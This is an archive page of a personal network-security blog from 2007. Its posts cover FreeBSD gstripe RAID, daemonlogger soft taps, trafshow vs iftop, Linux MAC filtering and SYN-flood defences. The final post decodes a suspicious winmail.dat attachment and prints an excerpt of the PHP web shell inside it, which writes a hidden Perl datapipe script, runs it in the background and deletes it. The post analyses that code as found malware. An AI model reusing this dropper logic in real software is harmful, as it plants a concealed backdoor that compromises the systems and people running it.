Tuesday, March 27, 2007

You love SPAM, don't you?

I was wondering why this similar spam email can bypass google email filtering, and it seems the spammer applies the really simple method, there's no single word that can be filtered from the message, in fact the creative spammer just attached this small jpeg file which contains interesting link -


This is where curiosity kills :P


If you need it, feel free to buy. I'm out of this business.

Enjoy ;]

Friday, March 23, 2007

Kivio - My Home Network Diagram

There are not many alternatives available when comes to producing clean network diagram in Open Source Arsenal, I know many people like to use Microsoft Visio for its user friendliness and the stencil set that are rich and complete. For simplicity, I don't use any tools that are mentioned here either, in fact I use kivio which you can find here -

http://www.thekompany.com/projects/kivio/

The screenshot below shows the user interface of kivio, it is actually part of Koffice(with the prefix K as always), Of course I won't show how I use it to draw network diagram, it is so easy that you can quickly learn it by clicking - adding stencil, drag and drop, highlight and you are done.


Here's the network diagram that I have created for my home network with simple Network Security Monitoring deployment. I think you can draw more complicated network diagram once you are handy with it.

The network diagram looks clean right, you can just install kivio on Gentoo Linux with -

shell>sudo emerge -v kivio

Now you can start to get your hand dirty with the application.

Enjoy ;]

Thursday, March 22, 2007

FreeBSD Gstripe

I decided to try out raid0 with FreeBSD gstripe and it seems to be a pretty easy and quick setup. I have 6 disks in this setup, first one will be the primary and installed with the OS, and I will combine all the other 5 disks and building the raid0 with striping for it.

shell>gstripe label -v -s 131072 nsm \
/dev/ad2 /dev/ad3 /dev/ad4 /dev/ad5 /dev/ad6 /dev/ad7

I constructed UFS2 file system with soft-updates enabled.

shell>newfs -U /dev/stripe/nsm

After it is done, I just mount it to /nsm -

shell>mount /dev/stripe/nsm /nsm

Then enable gstripe on system boot -

shell>echo 'geom_stripe_load="YES"' >> /boot/loader.conf

Add it to mount on boot -

shell>echo '/dev/stripe/nsm /nsm ufs rw 2 2' >> /etc/fstab

Thanks to chflags for pointing out, I just did simple benchmarking and it is kinda impressive though.

shell>time dd if=/dev/zero of=/nsm/test.img bs=1M count=1024
1024+0 records in
1024+0 records out
1073741824 bytes transferred in 8.884599 secs (120854281 bytes/sec)

real 0m8.907s
user 0m0.001s
sys 0m5.446s

Cheers ;]

Network Interface: Watchdog Timeout

My Sguil Demo Server is down, as I have no luck to recover it from hardware failure(something to do with mobo) as it is very old by now. I have unplugged the hard drive and insert it into another Pentium 3 box which was lying around.

Wonderfully, it seems that the OS boots up properly, and in less than 5 minutes, I see this error -

rl0: watchdog timeout

I'm thinking that maybe problem of the network interface, I swap it and change the network interface to another network interface which is xl0 in FreeBSD, reboot again and I see this -

xl0: watchdog timeout

As long as I bring up the interface, it shows watchdog timeout, I try to navigate my irq setting in bios but it seems alright, at last I try to google for luck and I found this link -

http://www.linuxquestions.org/questions/showthread.php?t=519599

I tried to boot it without acpi, and the watchdog timeout message is gone and now the network interfaces work properly. However it is cumbersome as it is always boot with acpi enabled, hence I need to add this one liner to disable acpi on boot -

shell>echo 'hint.acpi.0.disabled=1' > /boot/loader.conf

Everything seems to be all right now, and I have change my Sguil setup as well. Using daemonlogger, I have exported the pcap file from my home router to the sguil box. Sguil box has two network interfaces, one(promisc) will intercept the pcap data that transmitted by daemonlogger and another will be management interface where everyone can connect to.

Kudos to myself that the demo server is up again!

Cheers (;])

Wednesday, March 21, 2007

G Hotel

I just been to the seminar that organized by Mutiara Company, it is held at here -

http://www.ghotel.com.my/

The seminar is targeting Small & Medium Industry, seriously I'm not really interested in it as it is more business centric than discussing about the technology itself.

However I really love this hotel, the design rocks.

Cheers ;]

Sguil: New Face

Sguil has new face now, comparing to the old face, this looks more cleaner! You can check it out here -

http://sguil.sf.net


Enjoy ;]

Monday, March 19, 2007

Syn DOS: Countermeasures

I just got chance to read the Internet Protocol Journal that sent to me which you can find it here. The topic regarding "Defenses against TCP Syn Flooding Attacks" looks interesting to me, it discussed about multiple syn flooding types and the host/network based countermeasures against TCP Syn Flooding.

For the network based countermeasures, it seems to be very popular these days to shut down mass ddos attacks. Ingress filtering and inline(firewall/proxy) are preferred methods when defending against ddos attack. Since I love OpenBSD PF, I would suggest you take a look at these two links which offer you similar defending mechanisms but cost you almost nothing -

http://www.openbsd.org/faq/pf/filter.html#urpf

http://www.openbsd.org/faq/pf/filter.html#synproxy

About host based countermeasures, it introduces syn cache and syn cookies, I have never understood that much about how actually syn cache or cookies works until I have read it, however if you want to know more about it, you can download another paper which explaining the implementation of both mechanisms -

http://www.ece.cmu.edu/~adrian/731-sp05/readings/lemon-syn-cache.pdf

I checked out the sysctl of my FreeBSD box -

shell>sysctl -a | egrep 'syn(cache|cookie)'
syncache 1 8K - 1
syncache: 100, 15366, 0, 117, 3284
net.inet.tcp.syncookies: 1
net.inet.tcp.syncache.bucketlimit: 30
net.inet.tcp.syncache.cachelimit: 15359
net.inet.tcp.syncache.count: 0
net.inet.tcp.syncache.hashsize: 512
net.inet.tcp.syncache.rexmtlimit: 3

Interestingly, both are implemented in FreeBSD. Clear enough, you don't really need 999999999999 dollars to implement and build effective mechanisms to defend against DDOS, remember Open Source is always your friend.

Enjoy ;]

Saturday, March 17, 2007

Some Notifications

Currently my sguil demo server is down, if you have difficulty in connecting to my demo server, please be patient. The problem due to the hardware failure and I will fix it when I have time(probably next week).

Another thing should be the dead link to www.dissectible.org. I have shifted it and it is now having a new name called www.rawpacket.org. Many people unable to find the stuffs that I have uploaded previously and it is now at -

http://www.rawpacket.org/anonymous/

If any of you are good web developer, and you would like to contribute to open source and security community, please do contact me as I really need some helping hands. You can reach me at -

geek00l[at]gmail[dot]com

Enjoy ;]

Thursday, March 15, 2007

Daemonlogger: let's log

Marty(Snort) has written a packet logger/soft tap which is called daemonlogger where you can download here -

http://www.snort.org/dl/daemonlogger/daemonlogger-0.7.tar.gz

I haven't looked into it yet until I have talked to him today, thus I just downloaded and installed it with pretty straight forward steps -

shell>./configure --prefix=/usr/local/stow/daemonlogger-0.7

shell>make && make install

shell>cd /usr/local/stow

shell>stow daemonlogger-0.7

Checking daemonlogger version -

shell>daemonlogger -v

-*> DaemonLogger <*- Version 0.7 By Martin Roesch (C) Copyright 2006-2007 Sourcefire Inc., All rights reserved

shell>daemonlogger -h

USAGE: daemonlogger [-options]
-c Log packets and exit
-d Daemonize at startup
-f Load BPF filter from
-h Show this usage statement
-i Grab packets from interface
-l Log to directory
-m Generate log files and quit
-n Set output filename prefix to
-o Disable logging, retransmit data from
to
-p Use (path and filename)
-s Rollover the log file every
-t Rollover the log file every
-v Show daemonlogger version

shell>daemonlogger -i rl1 -o vr0 -p /nsm/daemonlogger-rl1.pid -d
[-] Interface set to rl1
[-] Tap output interface set to vr0[-] Pidfile configured to "/nsm/daemonlogger-rl1.pid"
[-] Daemon mode set

-*> DaemonLogger <*- Version 0.7 By Martin Roesch (C) Copyright 2006-2007 Sourcefire Inc., All rights reserved trinity:/nsm# tcpdump -i vr0 tcpdump: WARNING: vr0: no IPv4 address assigned tcpdump: listening on vr0, link-type EN10MB 17:44:22.340032 pr-in-f19.google.com.www > 192.168.0.155.2660: P 4107897218:4107897246(28) ack 3442614823 win 7200
17:44:22.340042 192.168.0.155.2660 > pr-in-f19.google.com.www: . ack 28 win 7504 (DF)
17:44:25.340047 192.168.0.155.4024 > pr-in-f19.google.com.www: . 4081159920:4081161360(1440) ack 3322996791 win 44330 (DF)
17:44:25.340062 192.168.0.155.4024 > pr-in-f19.google.com.www: P 1440:1766(326) ack 1 win 44330 (DF)
17:44:25.340073 192.168.0.155.1617 > zelazny.freenode.net.6667: P 1979289541:1979289553(12) ack 1468261941 win 16022 (DF)

The daemonlogger also supports pcap file rollver based on size and time, this is pretty useful to avoid writing external support scripts for it. I like this similar feature since I have used tethereal.

You can also deploy similar kind of setup that has been done by Richard which is described here using PF or in his Extrusion Detection book -

http://taosecurity.blogspot.com/2005/07/distributed-traffic-collection-with-pf.html

Just build a router box with 4 Network Interfaces(sk0-sk3) -

Router
External Interface(sk0) - Internet Facing
Internal Interface(sk1) - Internal Network

Soft tap
sk2 - Only watches port 80 traffics
sk3 - Monitor everything except port 80

Writing simple bpf filter to the file -

shell>echo 'port 80' > sensor-sk2.fil

shell>echo '! port 80' > sensor-sk3.fil


Running daemonlogger in soft tap mode -

shell>daemonlogger -f sensor-sk2.fil -i sk0 -o sk2 -d

shell>daemonlogger -f sensor-sk3.fil -i sk0 -o sk3 -d

All the port 80 traffics wil be transmitted to sk2 interface and the rest will be transmitted to sk3 interface. It is so simple to build distributed sensor/traffic collectors with daemonlogger.

Done.

Tag Richard's words -
One would have hoped the Pf dup-to function could send traffic to directly connected interfaces without the involvement of any IP addresses. Unfortunately, my testing revealed that assigning IP addresses to interfaces on both sides of the link is required.

The answer is daemonlogger, have fun!

Enjoy
(;])

Tuesday, March 13, 2007

Linux: Mac Filtering

I remember I have used OpenBSD in network bridge mode for Mac Address Filtering. I'm wondering is there possible to do Mac Address Filtering on Linux, and apparently it is not too hard once I have figured it out, it is pretty straight forward with quick kernel recompiling. Here's my note of doing it on Gentoo linux -

Checking if it is already compiled as module -

shell>egrep -i 'mac' /usr/src/linux-2.6.19-gentoo-r5/.config

CONFIG_NETFILTER_XT_MATCH_MAC=m

Since it is there, I need to know the module name, to locate it -

shell>sudo find /lib/modules/2.6.19-gentoo-r5/ -type f -name '*mac*'
/lib/modules/2.6.19-gentoo-r5/kernel/net/netfilter/xt_mac.ko

Loading the LKM -

shell>sudo modprobe xt_mac

Checking to see if the module is loaded properly -

shell>lsmod
Module Size Used by
xt_mac 2048 0
x_tables 14852 1 xt_mac

Now I just need to add it as well as the userland tool for netfilter - iptables since it is needed.

shell>echo "xt_mac" >> /etc/modules.autoload.d/kernel-2.6

shell>echo "iptable_filter" >> /etc/modules.autoload.d/kernel-2.6

Installing iptables userland tool -

shell>sudo emerge -v iptables

Once all the stuffs needed are loaded, we can start to test on the Mac Address Filtering. To block every single bits from the host with mac address 00:19:D1:2F:71:B5, I just run this -

shell>sudo iptables -A INPUT -m mac --mac-source 00:19:D1:2F:71:B5 -j DROP

That's pretty straight forward. To flush the INPUT chain after testing -

shell>sudo iptables -F INPUT

This is just quicky, hopefully I can get more handy later on iptables because I haven't used it for quite sometimes.

Enjoy ;]

Saturday, March 10, 2007

FreeBSD Openntpd

Previously I have shown the Openntpd setup on Gentoo, here's how you can quickly set it up on FreeBSD. Please do take note that this is more of ntp client type setup.

shell>pkg_add -vr openntpd

Configuring Openntpd by editing /usr/local/etc/ntpd.conf, just comment out the default ntp server and add the ntp server you want.

# sync to a single server
#server ntp.example.org

server ntp.jaring.my
server ntp.time.net.my

Add this one liner to /etc/rc.conf for it to run on system boot -

openntpd_enable="YES"

Start Openntpd manually now -

shell>/usr/local/etc/rc.d/openntpd.sh start

Done.

Enjoy :]

Friday, March 09, 2007

BackTrack 2 Sec LiveCD

For people who didn't notice, BackTrack 2 Sec LiveCD is out, you can check it out at -

http://www.remote-exploit.org/backtrack.html

Other than the LiveCD itself, I found the Codes&Tools and Research section pretty interesting especially the one that introducing wireless filter for ethereal/wireshark where you can find here -

http://www.remote-exploit.org/research/etherealwirelessfilters.html

Just download it now and you are fully equiped with all the useful security tools.

Peace ;]

Sguil Current - Demo Server

You may have noticed that the Sguil demo server that I run in dead state for quite sometimes. With some clues from Bamm, I able to get Sguil in CVS up and running, all of you are welcomed to test it out again, however you need sguil client in latest CVS as well in order to connect the Sguil demo server.

The Sguil demo server details are shown below -

Hostname: nsm.kicks-ass.org

Port:7734

Username: ninja

Password: blank

If you have sguil client crashes when playing around with it, please do save the error messages to the log and send it to sguil mailing list.

Here's the quick screenshots, you may notice that now all the agents are separated. The biggest feature in the Sguil Current should be PADS integration, you may see the PADS entries in the third pane.

New sguil client console

Sguil server and sensor Agents processes

Have fun!

Cheers :]

Friday, March 02, 2007

NSM: Trafshow vs Iftop

While we have many choices in Open Source world, it is tricky to choose a right one, everything down to the feet of what you want to do with it. There are many tools I like when monitoring network flow statistic in real time that are considered non-web based but cursed. However here I would like to make a comparison between two interesting tools which are trafshow and iftop.

Trafshow offers few unique functions that is are available via other tools, it has the features below -

- Colorization
- flow aggregation based on netmask length -a|A
- string tracing /|Ctrl-/
- bpf filter expression on the fly -f|F
- import cisco netflow data -u 9995
- hex data view on the fly

To learn how trafshow works, when we run trafshow without any arguments, it will monitor all the network interfaces available to you, you need to choose one to monitor.

shell>trafshow

Interface Address Description

em0 0:11:22:33:44:55 Ethernet
rl0 0:22:33:44:55:66 Ethernet
sk0 0:33:44:55:66:77 Ethernet
lo0 127.0.0.1 Loopback

By default it will aggregate the traffics based on guessed network id, here's the screenshot -


Thus if you want the exact ip address shown in trafshow, you need to run with netmask length of 32 -

shell>trafshow -a 32

The flexibilities of flow aggregation based on netmask length allows you to monitor the traffic from networks to networks and nodes to nodes, this creates very powerful capabilities when combining with the bpf filter expression, you can specify bpf filter expression by reading it from a file using -F, the good thing about it is that you can also directly inject the bpf filter expression by pressing f key when you are in trafshow monitor console.

Filter expression:port 80

Trafshow stores its color attributes in either /usr/local/etc/trafshow or ~/.trafshow. You can tune them easily, I always like to tune it for better view of the traffic, for example if I would like to watch the outgoing traffic from my DMZ network(172.16.1.0/24) for possible extrusion, I can just add this few lines to the configuration file -

# Private IP Addresses will be alarmed by Red foreground.
# Source Destination Color

172.16.1.0/24 any Red
any 172.168.1.0 Blue


With this kind of setup, all incoming traffics will be in blue colour and outgoing traffics will be in red, other useful color tuning will be based on port, if you want to monitor your network in case they are connecting to the irc bot network, you can specify -

6667 cyan # irc
6668 cyan # irc


Again you can easily combine features in trafshow to make more sense in monitoring, just specify this filter in trafshow monitor helps a lot -

Filter expression: src net 172.168.1.0/24 and dst portrange 6660-6670


Another useful function is string tracing, you can specify string that found in the traffic flow and keep watching it, just press / key and specify it, for example -

/yahoo

If yahoo string is shown in trafshow monitor, it will be highlighted all the while and you can easily keep your eye on it. You can disable it by pressing Control /.

I have actually inteprete Cisco Netflow using -u option before, it works pretty well though. Since I didn't take a screenshot previously, thus I can't show it here. There are many functions in trafshow that you can easily enable and disable using toggle key such as name/port resolution can be enabled or disabled via n key, changing netmask length via A key and so forth.

The last feature that I found really powerful is the traffic hex view, this gives you the feeling of MATRIX movies especially when you catch traffics that are considered malicious, here's the screenshot I have, you just need to press enter after choosing the traffic flow in order to access the network stream -


Iftop on the other hand offers the functions below -

- src|dst aggregation s|d
- logarithmic traffic bar -b
- bits|bytes per how many seconds cycle -B
- net filter(bpf filter expression) -f|f
- screen filter(regex expression) l

The main configuration of iftop is ~/.iftoprc, if you have multiple network interfaces in the same host that monitoring different networks, I suggest you put all the configurations in .iftoprc except interface and net-filter variable, you can learn more about it by reading the man page of iftop. Then putting iftop commands in different scripts for different network interfaces, for example -

shell>echo 'iftop -i eth0 -F 172.16.1.0/24' > iftop-eth0

shell>echo 'iftop -i eth1 -F 172.16.2.0/24' > iftop-eth1

shell>chmod +x iftop-eth*

Now you just run the script for the interface you want to monitor. All other attributes are better to be stored in ~/iftoprc, you can easily tune it for your network environment.

There's one feature I like about iftop, the traffic bar(white color) where it shows the logarithmic scale, you can easily identify which host are consuming more bandwidths in current time. Here's the screenshot -


If you just want to view the aggregated traffics from either source or destionation, trigger s or d in iftop monitor console will do. This allows you to monitor total bandwidths of certain source/destination IP per any port. The dns resolution can be turn on or off by pressing n key. You can also change to show the bits/bytes per how many seconds, it offers 2s, 10s and 40s cycle.

Similar to trafshow, it has net filter where you can either specify it using -f in command line option or pressing f key to enter the bpf filter expressions, for example -

Net filter > port 53

Now you can just monitor dns traffic. For the screen filter which allows you to use regular expressions, it works similarly to trafshow strings search too, you just need to press l key in iftop monitor and it will show -

Screen filter> smtp

This will allows you to look at the smtp traffic if you have mail traffics flowing around.

Sometimes you prefer to run iftop with proper options in command line instead of changing its behaviour in the iftop monitor, you can do so. For example you want to apply bpf filter for ftp traffic.

shell>iftop -i rl0 -f port 20 or 21 -F 192.168.5.0/24
iftop: found arguments following options
*** some options have changed names since v0.9 ***
iftop: display bandwidth usage on an interface by host

Synopsis: iftop -h | [-npbBP] [-i interface] [-f filter code] [-N net/mask]

-h display this message
-n don't do hostname lookups
-N don't convert port numbers to services
-p run in promiscuous mode (show traffic between other
hosts on the same network segment)
-b don't display a bar graph of traffic
-B Display bandwidth in bytes
-i interface listen on named interface
-f filter code use filter code to select packets to count
(default: none, but only IP packets are counted)
-F net/mask show traffic flows in/out of network
-P show ports as well as hosts
-m limit sets the upper limit for the bandwidth scale
-c config file specifies an alternative configuration file

iftop, version 0.17

It seems doesn't work and show all the command options instead, thus I tried to enclose it with single quote -

shell>iftop -i rl0 -f 'port 20 or 21' -F 192.168.5.0/24

Here's it goes, it works properly and check out the screenshot -


Overall trafshow has almost all the features that are available in iftop, I prefer trafshow as it has the colorization feature and the capability to read netflow data, this is making reactive network security monitoring can be done without much delays, the hex data view of network stream also makes it terrific in performing real time incident response(You are not watching flow statistic only but full content data in real time). The only advantage of using iftop over trafshow should be the traffic direction that shown in the monitor, this makes a lot of sense when you want to monitor the traffic and it is more bidirectional oriented.

Both tools are incredibly useful and have their pros and cons. At the end, it is about preference sometimes.

Peace (;])

Thursday, March 01, 2007

Transport Neutral Encapsulation Format

Someone has sent this file to me and telling me that something is wrong with this file, the file name is winmail.dat. I was wondering what's is contained in the file and as usual I check on the file type -

shell>file winmail.dat
winmail.dat: Transport Neutral Encapsulation Format

I haven't seen this file type before, while I'm wondering why, wiki seems to answer my question in pretty details -

http://en.wikipedia.org/wiki/Transport_Neutral_Encapsulation_Format


Okay, so I have never been a Outlook user, now I need to look at how to decode the file properly, I found this simple trick using tnef,

shell>eix tnef


net-mail/tnef
Available versions: 1.3.3 1.3.4 ~1.4.3
Installed: 1.3.4(18:07:41 02/22/07)
Homepage: http://world.std.com/~damned/software.html
Description: Decodes MS-TNEF MIME attachments

Eix is gentoo tool that similar to debian apt-cache which allows you to search for the applications in the portage, installing it is pretty quick -

shell>emerge -v tnef


Once it is installed, I can easily list the attachment in the TNEF file -

shell>tnef -f winmail.dat -t

css.php

To extract the attachment and save the message in the body into the desired directory, I just need to run -

shell>tnef -f winmail.dat --save-body -C tnef-dir/

shell>cd tnef-dir/

shell>/tnef-dir $ ls -al

total 100
drwxr-xr-x 2 geek00l geek00l 4096 Feb 22 18:17 .
drwxr-xr-x 44 geek00l geek00l 4096 Feb 22 18:10 ..
-rw-r--r-- 1 geek00l geek00l 82942 Feb 22 18:17 css.php
-rw-r--r-- 1 geek00l geek00l 1454 Feb 22 18:17 message.rtf

Here's the partial contents in css.php that looks interesting -

if(is_writable("/tmp")){
$fp=fopen("/tmp/nst_perl_datapipe.pl","w");
fwrite($fp,"$datapipe_pl");
passthru("perl /tmp/nst_perl_datapipe.pl &");
unlink("/tmp/nst_perl_datapipe.pl");
}else{
if(is_writable(".")){
mkdir(".nst_datapipe_tmp");
$fp=fopen(".nst_datapipe_tmp/nst_perl_datapipe.pl","w");
fwrite($fp,"$datapipe_pl");
passthru("perl .nst_datapipe_tmp/nst_perl_datapipe.pl &");
unlink(".nst_datapipe_tmp/nst_perl_datapipe.pl");
rmdir(".nst_datapipe_tmp");
}
}


I just learned the new file format and the way to read TNEF file without using Windows, have fun!

Enjoy (;])